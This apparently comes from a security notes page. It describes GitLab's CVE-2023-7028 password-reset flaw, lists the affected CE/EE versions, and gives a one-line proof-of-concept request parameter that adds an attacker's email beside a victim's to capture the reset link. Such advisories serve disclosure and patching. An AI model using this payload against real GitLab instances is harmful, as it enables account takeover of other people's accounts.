Gitlab - CVE-2023-7028

Tracked as CVE-2023-7028, the flaw has been awarded the maximum severity of 10.0 on the CVSS scoring system and could facilitate account takeover by sending password reset emails to an unverified email address. It affects all self-managed instances of GitLab Community Edition (CE) and Enterprise Edition (EE):

16.1 prior to 16.1.6
16.2 prior to 16.2.9
16.3 prior to 16.3.7
16.4 prior to 16.4.5
16.5 prior to 16.5.6
16.6 prior to 16.6.4
16.7 prior to 16.7.2

POC:

user[email][]=valid@email.com&user[email][]=attacker@email.com

Last updated 4 months ago